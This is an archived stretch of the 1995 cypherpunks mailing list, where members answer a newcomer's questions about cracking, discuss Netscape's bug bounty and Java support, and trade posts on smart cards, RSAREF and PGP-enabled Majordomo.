 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 12 Oct 95 22:11:38 PDT
To: sameer <sameer@c2.org>
Subject: Re: Netscape beta 2.0
In-Reply-To: <199510130224.TAA04729@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.951012215735.29068F-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 12 Oct 1995, sameer wrote:

> Hey those shirts aren't measly! They're high quality Fruit of
> the Loom shirts, limited edition, etc. etc. 

Well, I think "cyberpunc X" (give me a break) may have suggested
(inadvertently) Sameer's next T-shirt motto:

       			 I CRACKED MS STT
			 AND ALL I GOT WAS
			THIS MEASLY T-SHIRT


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 12 Oct 95 22:10:43 PDT
To: zoetrope@infinet.com
Subject: Re: 90%
Message-ID: <199510130510.WAA17526@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 PM 10/12/95 -0400, you wrote:
>Can I ask a question....are you guys into cryptology for the interesting
>facts and knowledge or fer cracking unix codes and raising havoc?

Cryptography can cause far more interesting kinds of havoc than scaring
a few marketroids about crackers cracking their market shares,
or scaring a few spooks that they might not be able to eavesdrop on
the American public.  Cryptography is a way of changing the balance of
power about who owns your personal information.  Computers are very good
at centralizing and combining information - once something's in a major
database, it's easy for the people who own databases to compare them with
other databases,
so your Social Security Number and Driver's License Number and credit cards
and phone numbers and TRW credit report all pretty much tell people what
you're doing, what kind of lifestyle you lead, where you're travelling,
what magazines you read, where to find you if they want, where your money is,
what kind of junk mail to send you, whether your house is worth burglarizing,
whether you'd be a good target for the draft or a tax audit, etc.
Not much you can do about it except not give people information,
and that's getting tougher to do, especially if you like conveniences of
modern American life like employee-style jobs and renting or buying houses
or having a driver's license when the cops stop your car for no good reason.

But with cryptography, you can structure transactions so that people get all
the information they need to do business with you (if you want them to),
and none of the information they don't need.  Imagine if your credit smart-card
didn't have your name on it (because only you have the PIN), and gave out a
different number every time you used it (but Visa doesn't mind, because
they know who you are.)  Imagine if, instead of having one master SSN that you
write on every bloody form you fill out in your life, you have a list of
tax id numbers, and can get more if you need them, so everybody who needs
to send the IRS a chunk of your money can do so, but the numbers aren't tied
together except back at the tax office, where nobody's going to care until
you retire.
(That doesn't even take cryptography, though it helps.)  Imagine if people
started thinking that your own private information was your own, and didn't
_need_ to see three kinds of picture ID to let you rent a mailbox or a car,
because you could use crypto methods to give them the information they need
to charge you for the car if you rip it off, without all the other baggage.

And imagine if all you need to do business is that barcode tattooed on your arm,
which you can wave by the machines anywhere you go, for everything you do.
Crypto's the alternative.

=====
Now, as far as the things you first asked about go, the theoretical stuff
_is_ pretty neat, and has finally given me an excuse to go study up on
number theory, and scaring the public about weaknesses of the computer
products they use is something the mass media and legislators like better 
than many of us do (though having your friends get their pictures in
Wired and the New York Times is kind of fun...) - it'd be nice if the
people who make popular software would take security seriously,
instead of putting out some of the thoughtlessly weak stuff that they do.
Sometimes it takes a 2x4 to do the job; sometimes the press just overreacts.

I do occasionally hang out with people who have the police watch them
because their politics aren't correct (whether to the left, right, or
deep center),
or because they like recreational chemicals that are safer than tobacco
and alcohol, or just because they're weird.  That's wrong, and people
have a right to their privacy.  (Hasn't stopped me from offering the
Philadelphia Police Red Squad coffee when they were watching a convention
I was at (they'd brought their own :-) - but those guys really still are
in business.)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael James Gebis <m-gebis@students.uiuc.edu>
Date: Thu, 12 Oct 95 20:14:21 PDT
To: cypherpunks@toad.com
Subject: Re: 90%
In-Reply-To: <m0t3aMe-000KBGC@mail.infinet.com>
Message-ID: <199510130314.WAA12586@ux5.cso.uiuc.edu>
MIME-Version: 1.0
Content-Type: text/plain


In uiuc.mlist.cypherpunks zoetrope writes:

>Can I ask a question....are you guys into cryptology for the interesting
>facts and knowledge or fer cracking unix codes and raising havoc?

_I_ got into it for the chicks.  Upon reflection it seems that it may not
have worked as well as I might have hoped. :)

-- 
Mike Gebis  m-gebis@uiuc.edu    Mean people suck.
http://www.uiuc.edu/ph/www/m-gebis/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Thu, 12 Oct 95 19:29:07 PDT
To: Raph Levien <raph@CS.Berkeley.EDU>
Subject: Re: Netscape 2.0b1J still core dumps on Java
In-Reply-To: <199510122211.PAA24518@kiwi.cs.berkeley.edu>
Message-ID: <Pine.SUN.3.91.951012222710.16322B-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Oct 1995, Raph Levien wrote:

> I pointed the latest beta (Solaris 2.4) towards this URL:

Security or no, I can't take Java seriously if it is only going to run on 
Solaris and not SunOS...

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Thu, 12 Oct 95 19:34:09 PDT
To: cypherpunks@toad.com
Subject: T-Shirts
Message-ID: <m0t3ZsP-000KBCC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        Ya but a multi million dollar corp like netscape should be paying
big bucks for those bugs....Or the mob might...ya get my drift....A lot of
people give personalized T-shirts but not everyone can jeopardize a corp's
existence?



                 Waiting a reply,



                                    CyberPunc X






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 12 Oct 95 19:47:58 PDT
To: JonathanZ@consensus.com (Jonathan Zamick)
Subject: Re: IDEA algorithm
In-Reply-To: <v02120d07aca4c6d130f2@[157.22.240.13]>
Message-ID: <199510130250.WAA08368@homeport.org>
MIME-Version: 1.0
Content-Type: text


| (Btw... what would be the absolute coolest thing folk would like to see
| added to RSAREF? That is, other than code that we will need to negotiate
| for. What new thing, speed upgrade, enhancement, etc would just tickle?)

	Consistent pricing.  The knowledge that any app I develop
using RSAREF can be made into licensed for commercial use product for
a set, known, published fee.  This would be the biggest win for
Consensus.

	Another really big win would be to add more entry points to
the code to legitimize Wei Dai's excellent Crypto++ library, which has
to jump in at all sorts of unpublished interfaces.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 12 Oct 95 23:03:04 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape beta 2.0
In-Reply-To: <m0t3YoM-000K8BC@mail.infinet.com>
Message-ID: <307E0031.3FFD@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


zoetrope@infinet.com wrote:
> 
>         For Finding a security bug in Netscape, is it true you only get a
> measly shirt? if that is true why not just start a virus?

  If you are the first to find a severe security bug in Netscape,
we will send you a check for $1000.  You can see the rules on
our web site.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Thu, 12 Oct 95 20:03:52 PDT
To: cypherpunks@toad.com
Subject: Re: T-Shirts
Message-ID: <m0t3aLG-000KBhC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain



>Read http://home.netscape.com/newsref/pr/newsrelease48.html, announced here
>a scant two days ago, then rephrase your question....
>
>-Futplex <futplex@pseudonym.com>
>
>
Thanks to a referral by futplex I see the error in my question....
Netscape is in fact offering money and other freebies but some Kevin Mitnick
would rather have fun with it like messing with netscape or wait for the
Final v.2.0 to come out then have a lot of fun!!!


anyway thanks again Futplex,
               the one and only,
                       CyberPunc X
                                  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 12 Oct 95 15:00:23 PDT
To: cypherpunks@toad.com
Subject: Smart Card Target
Message-ID: <199510122200.XAA05917@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Partnership Targets Billion Dollar Smart Card Market 


Denver, October 11 -- Racom Systems Inc. has entered into
a multi-million dollar partnership with Rohm Co. Ltd, a
Japanese company, to manufacture the ferroelectric chips
used in contactless, battery-free smart cards. The deal
also calls for Rohm to manufacture a new generation of
advanced microprocessor-based chips currently under
development for use in high-security financial
applications.

Rohm is currently starting up a new 0.6 micron wafer
fabrication operation in Kyoto, Japan, dedicated to the
high-volume manufacture of ferroelectric chips, and has
licensed Racom's contactless, battery-free technology
specifically for the Japanese market. Racom said the
cards are already in use in over 100 installations
worldwide.

Racom spokesperson Laura Keane said the
ferroelectric-based smart cards, which exchange
information with readers via radio waves instead of being
passed through a reader like a credit card, are used for
electronic ticketing: automatic fare collection on
buses, subways and trains, electronic point-of-sale, and
electronic benefits transfer.

Racom said the new cards are superior to the earlier
smart cards that use conventional semiconductor
technologies because of their unique combination of
high-speed, low-power, non-volatile operation, and high
reliability.

The new smart cards have the ability to store as many as
16 different accounts, said Keane. It could hold your
checking account, credit card account, let you pay for a
bus or train ticket, and allow you access to controlled
areas within your workplace.

Keane spoke about some of the card's advantages. In
automatic fare collection, users no longer have to carry
the correct change or tokens, waiting times to board are
reduced, and the risk of robbery of bus, subway and train
operators is reduced since they have less cash on board.

"It's a stored value card," said Keane. "You put money on
the card and daily as you use it you wave it over an
antenna and it deducts the fare for that day."

Keane said electronic ticketing primarily benefits the
frequent traveler. The user would simply wave their card
over an antenna at a kiosk in the terminal after
selecting their destination and class of accommodation
for immediate ticketing. The card would have your seating
preference and frequent flyer number recorded and would
provide that information to the ticket machine.

According to Jerome Svigals, publisher of Smart Cards &
Comments and a consultant to the electronic banking
industry, contactless technology is very valuable to the
user because of its speed, convenience, ease of use, low
cost and perhaps most importantly its security. "Even
more significant is this smart card's ability to manage
multiple applications with contactless technology that
ensures the highest long-term data integrity, especially
important for electronic purse requirements," said the
industry consultant.

Press contact: Laura Keane, Racom Systems, 800-789-7627;
Public contact: 800-789-7627.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Thu, 12 Oct 95 20:05:22 PDT
To: cypherpunks@toad.com
Subject: 90%
Message-ID: <m0t3aMe-000KBGC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


Can I ask a question....are you guys into cryptology for the interesting
facts and knowledge or fer cracking unix codes and raising havoc?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 12 Oct 95 23:05:40 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape 2.0b1J still core dumps on Java
In-Reply-To: <199510122211.PAA24518@kiwi.cs.berkeley.edu>
Message-ID: <307E00CD.CF7@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Thomas Grant Edwards wrote:
> 
> On Thu, 12 Oct 1995, Raph Levien wrote:
> 
> > I pointed the latest beta (Solaris 2.4) towards this URL:
> 
> Security or no, I can't take Java seriously if it is only going to run on
> Solaris and not SunOS...
> 
> -Thomas

  Netscape Navigator 2.0 does support Java on SunOS.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Oct 95 22:53:34 PDT
To: cypherpunks@toad.com
Subject: Re: Welcome to the list
Message-ID: <aca34b3d0702100476b5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:45 AM 10/13/95, Rich Salz wrote:
>You will probably find it most helpful to read through a few months
>archives of the list (ask around for back digests, usenet access, etc).
>And read the Tim's cyphernomicon.  You'll find most intro-level answers
>there, and you're less likely to annoy the natives. :)

Thanks, Rich, for the mention of my extremely long FAQ, available (if
you're lucky and Netcom isn't too jammed up) at ftp.netcom.com in
/pub/tc/tcmay, as "CP-FAQ." Also in compressed forms.

A better version is the Web version at;

http://www.oberlin.edu/~brchkind/cyphernomicon/

(And there are a couple of other sites that have it.)

It is very long, and doesn't include specific things about the Netscape
hack, the au courant topic, but it does have a lot of history, background,
motives, and interesting (to me at least) applications/implications.

(The problem with most FAQs is that they're either too basic, or too
long. I opted for the encyclopedic, figuring people could use search tools.
Even so, lots of topics don't get enough coverage.)

The best way to get rolling with the Cypherpunks list is, I think, to do
what Rich says. Read for a while, look at the archives, get a copy of
Schneier's book and maybe a few others (Bamford, Kahn, the Springer-Verlag
books, etc.), and find an area that interests you.

--Tim May




Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 12 Oct 95 20:24:39 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: [NOISE] Re: Aquaria wars ?
In-Reply-To: <9510121708.AA00880@elysion.eiss.ira.uka.de>
Message-ID: <199510130324.XAA14630@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hadmut Danisch writes:
> Some (many) years ago there was a very large and long flamewar at the
> usenet. As far as I know it was called "The Aquaria Wars" because it
> began with a debate about the question whether the newsgroup should be
> named "alt.aquaria" or "alt.aquarium". I am looking for historical
> information about this flamewar.

That was before my time, but I've certainly heard about it. Check out the
entry for Richard Sexton in Part 4 of Dave DeLaney's excellent Net.Legends FAQ.

(I can't seem to find an _accessible_ HTML copy of it right now, just
several broken ones, but 
ftp://rtfm.mit.edu/pub/usenet/news.answers/net-legends-faq/part4 works.)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Oct 95 23:17:15 PDT
To: cypherpunks@toad.com
Subject: Who has Copies of the "Internet Handbook"
Message-ID: <aca350ab09021004bd3c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:36 AM 10/13/95, Nesta Stubbs wrote:
>On Thu, 12 Oct 1995 zoetrope@infinet.com wrote:
>
>> Can I ask a question....are you guys into cryptology for the interesting
>> facts and knowledge or fer cracking unix codes and raising havoc?
>>
>If you look on pg. 34 of the handbook, Sect. 97.A13 says that this list
>is primarily for passing child porn and dirty limericks in unbreakable
>codes.  You really should read your Internet Handbook before asking these
>questions.  Your Internet Service Provider DID give you the Official
>Internet Handbook right?

Many of us tried to get copies before the Great Handbook Renaming (*), but
were unable to. My sysadmins at Portal, then Netcom, kept promising it
would be made available, but I never saw it. In most jurisdictions the
"Internet Handbook" is simply not available.

Can't somebody make it available via an anonymous remailer? Surely they
can't be watching _all_ of the time?

In any case, as I understand things, all mentions of Cypherpunks were taken
out of the Handbook in 1993.

--Klaus!

(* For the newbies, the Internet Handbook used to be known as "The
Protocols of the Elders of the Arpanet," but the name was changed in the
Great Renaming. It was considered controversial even back in 1973 when I
got my first Arpanet account.)





Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Thu, 12 Oct 95 20:59:38 PDT
To: zoetrope@infinet.com
Subject: Re: 90%
In-Reply-To: <m0t3aMe-000KBGC@mail.infinet.com>
Message-ID: <Pine.SUN.3.91.951012235716.16515A-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Oct 1995 zoetrope@infinet.com wrote:

> Can I ask a question....are you guys into cryptology for the interesting
> facts and knowledge or fer cracking unix codes and raising havoc?

I am into cryptology for freedom and privacy.  If it takes "cracking a few
unix codes" to make people realize that we do not have good security right
now and we need better crypto products and we need to fight government laws
that hamper crypto development in this country, so be it. 

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Thu, 12 Oct 95 21:15:04 PDT
To: cypherpunks@toad.com
Subject: Flame Wars
Message-ID: <m0t3bS9-000K5HC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        I am sorry if I have annoyed or offended anyone here, It was not my
intention of course......I dont want to hold any grudges especially with
Sameer....I havent done much cracking and have alot of questions I bet alot
of you had when you were 13 anyway zoetrope as in coppolla's
studio....again sorry If I offended or annoyed you....



                Sincerely,
                      CyberPunc X






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Fri, 13 Oct 95 00:12:42 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Flame Wars
In-Reply-To: <199510130601.CAA23061@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.91.951013000634.32151A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


> However, if you really are that young your questions are
> understandable, as was your manner. I got started in computers when I
> was about eleven many, many years ago, and I remember what it's like
> when you know more than most adults about technology but don't quite
> know how to interact with other technical people yet. (I also remember
<g> I remember it too.. and it was only 15 years ago.. sheesh, where has 
the time gone..

> 
> reasons for what we do. However, many of us are interested in the
> topic for political reasons. We view cryptography as a way to ensure
> freedom and privacy for people around the world, and we try to advance
Hell, to be honest, I don't even fathom 1/2 of what is said around here.. 
but I understand the need to encrypt, have trained myself to use PGP, and 
am politically active.. I mainly use the list for a who's who of crypto and 
a reference guide to what's going on in the field.. <g>

> 
> If you are interested in cryptography and in learning a bit about what
> we do, I suggest that you first read a good introductory book on
> cryptography like Bruce Schneier's "Applied Cryptography" (which is
> coming out in a new edition in only a few weeks) and that you listen

Trust me on this one.. I was the newbie a couple of months ago and 
stepped into it pretty big for my first time out.. Afterwards (of course)
I read the Faq's, and have lurked a lot since.. take this list slow, as 
it will eventually pay out in the info you are looking for..

-Greets to the newer newbie-

RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Thu, 12 Oct 95 21:23:11 PDT
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Smart Card Target
In-Reply-To: <199510122200.XAA05917@utopia.hacktic.nl>
Message-ID: <Pine.OSF.3.91.951013002405.22760A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone REALLY want to carry a card that could be sucked dry by 
radio? "Not I", said the little red hen!

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Thu, 12 Oct 95 21:33:12 PDT
To: cypherpunks@toad.com
Subject: hardware
Message-ID: <m0t3bje-000K6bC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        is there any Hardware involved in cryptology and code hacking other
than a comp and some accelerator chips?

                                CyberPunc X






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Thu, 12 Oct 95 21:28:34 PDT
To: cypherpunks@toad.com
Subject: Majordomo & PGP
Message-ID: <199510130430.AAA28277@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's something that might be of interest.....

Bob

Date: Thu, 12 Oct 1995 12:01:00 -0400
Message-Id: <9510121601.AA14372@hawww.ha.osd.mil>
To: cwilson@slurp.neu.sgi.com, majordomo-workers@GreatCircle.COM
Subject: PGP'ger-rated Majordomo ready for testing/comments
Sender: majordomo-workers-owner@GreatCircle.COM
Precedence: bulk


I've just finished integrating PGP into Majordomo 1.93.  I would like some
feedback on its ease of use, functionality etc, so I may improve it before
releasing the code to the Public.  And there's always that doco thing...
Should be ready by month's end.

If secure 'domo administration or secure distribution is of interest to you,
send the following commands in an email body to Majordomo@hawww.ha.osd.mil:

        help            <-- not the usual stuff.  better read it.
        info pgptest
        info pgpdomo-announce

If you are a PGP user, please subscribe to pgptest@hawww.ha.osd.mil.  This is
a PGP protected test list that needs a workout.  I'll spew pieces of my code
to pgptest for people to review.

Any comments, bug reports, oversights, anything (except money), please forward
to phollins@hawww.ha.osd.mil.

Thanks






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 12 Oct 95 21:33:02 PDT
To: privsoft@ix.netcom.com (Steve Orrin)
Subject: Re: responce to graphic encryption replies
In-Reply-To: <199510121733.KAA18977@ix7.ix.netcom.com>
Message-ID: <199510130432.AAA14986@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Steve Orrin writes:
> Also, I have recently put together an info sheet on the Security provided 
> by PrivaSoft which I can post if there is interest. 

I for one am interested. Perhaps you could put it up on your web pages ?

[...]
>     One of the key strengths, as I see it, of graphic encryption is 
> that during decryption via hacking, there is an added time element when 
> a human interface is required to verify the product, ( since it is a 
> graphic picture being produced, regular checksums for intelligible 
> words can't be used sans implementing OCR), even if this is only 10 
> milliseconds per try this increases the time to crack 

This is an interesting point I hadn't previously considered. Can anyone
comment on the state of the art in fast approximate character recognition ?
I expect that the people working on recognition of text in TV pictures etc.
would have a good idea. 

My lay computer scientist's guess is that it wouldn't be all that difficult to
pick a small sample window a couple of characters wide, and decide if the
contents were a couple of characters. Then you'd worry about testing for
higher-level linguistic intelligibility as a second cut. But I don't
really know.

A known-plaintext attack on the system would ideally include knowledge of the
typefaces, fonts etc. typically used to print documents at the source.... 

> exponentially 
> beyond that of a data encrypted document of similar key length and 
> algorithm strength. 

ObTheoretician:
Um, exponentially in terms of what ?  It sounds like this multiplies the
expected brute force cracking time by a constant, but doesn't change the
big-O time of the algorithm. I agree, however, that big constants can be
rather significant when it comes to real world applications.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@cynico.com>
Date: Thu, 12 Oct 95 22:41:40 PDT
To: zoetrope@infinet.com
Subject: Re: 90%
In-Reply-To: <m0t3aMe-000KBGC@mail.infinet.com>
Message-ID: <Pine.BSD.3.91.951013003235.12157B-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Oct 1995 zoetrope@infinet.com wrote:

> Can I ask a question....are you guys into cryptology for the interesting
> facts and knowledge or fer cracking unix codes and raising havoc?
> 
If you look on pg. 34 of the handbook, Sect. 97.A13 says that this list 
is primarily for passing child porn and dirty limericks in unbreakable 
codes.  You really should read your Internet Handbook before asking these 
questions.  Your Internet Service Provider DID give you the Official 
Internet Handbook right?


Nesta Stubbs		     "Betsy, can you find the Pentagon for me? 
Cynico Network Consulting     It has five sides and a big parking lot" 
nesta@cynico.com			-Fred McMurray-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 12 Oct 95 21:48:14 PDT
To: zoetrope@infinet.com
Subject: Welcome to the list
Message-ID: <9510130445.AA04028@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


You will probably find it most helpful to read through a few months
archives of the list (ask around for back digests, usenet access, etc).
And read the Tim's cyphernomicon.  You'll find most intro-level answers
there, and you're less likely to annoy the natives. :)
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 22:20:01 PDT
To: Mark <mark@lochard.com.au>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510122235.AA41086@junkers.lochard.com.au>
Message-ID: <199510130518.BAA22989@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mark writes:
> >It was surprisingly weak for a John Markoff story (he usually gets the
> >details exactly right) but it is an issue that had to be brought up
> >and I see no reason to call it a bad article overall.
> 
> *snort* I've been trying to keep my views to myself on this but claiming
> Markoff usually gets things right is plain misleading. His articles are as
> about as one sided as you can get and full of factual inaccuracies. The
> Mitnick series were a farce and his latest work is reactionary fluff and
> shows his true lack of understanding of his topics.

Pardon my saying it, but that's totally off base. Until this article, I
caught him in one failing -- he did not ask the state department for
comment when he did his story on Phil Karn's CJ and only reported the
pro-export viewpoint. When I wrote him about it, he sounded embarrassed
that he hadn't said he would try to be more balanced next time. Other
than that, Markoff has been a paragon of journalistic integrity,
following the rules of the profession almost by the book.

Yeah, he was overinvolved in the Mitnick thing. Who among us is
perfect? It's not like he sought it out, anyway -- Mitnick involved him,
and who among us is rational enough to take ourselves off of
interesting work under such circumstances? He's as close as you are
going to get to meeting the journalistic ideal. You aren't going to
get perfect with mere human beings reporting the news. I'm willing to
settle for someone who gets the job right nearly all of the time.

Maybe he got lazy on this last article -- some of the stuff that made
it sound like NFS was used in wide area file transfer was really
strange -- but usually he gets *all* the details right. Who else
manages that? Can you name a better reporter? I can name five worse
ones covering the same beat right now without thinking about it.

Now, if he keeps being lazy I'll naturally change my opinion. Right
now, however, he's still up there in the pantheon in my book.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 22:33:04 PDT
To: zoetrope@infinet.com
Subject: Re: T-Shirts
In-Reply-To: <m0t3ZsP-000KBCC@mail.infinet.com>
Message-ID: <199510130532.BAA23011@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



zoetrope@infinet.com writes:
>         Ya but a multi million dollar corp like netscape should be paying
> big bucks for those bugs....Or the mob might...ya get my drift....Alot of
> people give personalized T-shirts but not everyone can jeapordize a corps
> existed?

If you are looking to make money off of this sort of thing, get a
reputation and start consulting or selling security software.  If your
interest is just in being obnoxious, please crawl back under your
rock. Either way, you are way out of line.

Oh, and you might want to learn how to spell and how to write in
standard English grammar if you want to be taken seriously.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 22:36:11 PDT
To: zoetrope@infinet.com
Subject: Re: 90%
In-Reply-To: <m0t3aMe-000KBGC@mail.infinet.com>
Message-ID: <199510130535.BAA23019@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



zoetrope@infinet.com writes:
> Can I ask a question....are you guys into cryptology for the interesting
> facts and knowledge or fer cracking unix codes and raising havoc?

I think I've figured it out.

I'm sure you'll be fine when you get past your 16th birthday, but
could you please leave us alone until then? Some of us have serious
work to do.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 23:01:16 PDT
To: zoetrope@infinet.com
Subject: Re: Flame Wars
In-Reply-To: <m0t3bS9-000K5HC@mail.infinet.com>
Message-ID: <199510130601.CAA23061@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



zoetrope@infinet.com writes:
>         I am sorry if I have annoyed or offended anyone here, It was not my
> intention of course......I dont want to hold any grudges especially with
> Sameer....I havent done much cracking and have alot of questions I bet alot
> of you had when you were 13 anyway zoetrope as in coppolla's
> studio....again sorry If I offended or annoyed you....

If you are actually 13, I apologize for the comments I made earlier.
However, if you really are that young your questions are
understandable, as was your manner. I got started in computers when I
was about eleven many, many years ago, and I remember what it's like
when you know more than most adults about technology but don't quite
know how to interact with other technical people yet. (I also remember
that I didn't appreciate people thinking that I didn't know how to
interact with other people, but that's another story.)

By the way, generally, it works better when you join a new mailing
list if you sit and listen for a while to get the flavor of what is
going on.

Anyway, let me try to answer your question.

We don't study cryptography and data security for any one reason -- we
are a big and very diverse group of people and we have many different
reasons for what we do. However, many of us are interested in the
topic for political reasons. We view cryptography as a way to ensure
freedom and privacy for people around the world, and we try to advance
that cause by studying cryptographic systems and sometimes computer
security in general. Other reasons people like doing cryptography work
is that it's a fun area of math/computer science to fool around with in
and of itself, and that some of us, including me, have paying work
doing things like computer and network security.

Most of us don't want to break in to computer systems for the sake of
breaking in to them, and in fact most of us don't even actually break
in to computers per se, but we do try to break badly designed
cryptographic software and security systems in order to get people to
build them better -- we tend to publicize these efforts both so that
we can get as many people working on them as possible (the more brains
the better) and so that we can make sure that people are aware of
flaws so that they will fix them or so that, if they aren't fixed,
people will avoid the software with the problems. "Security through
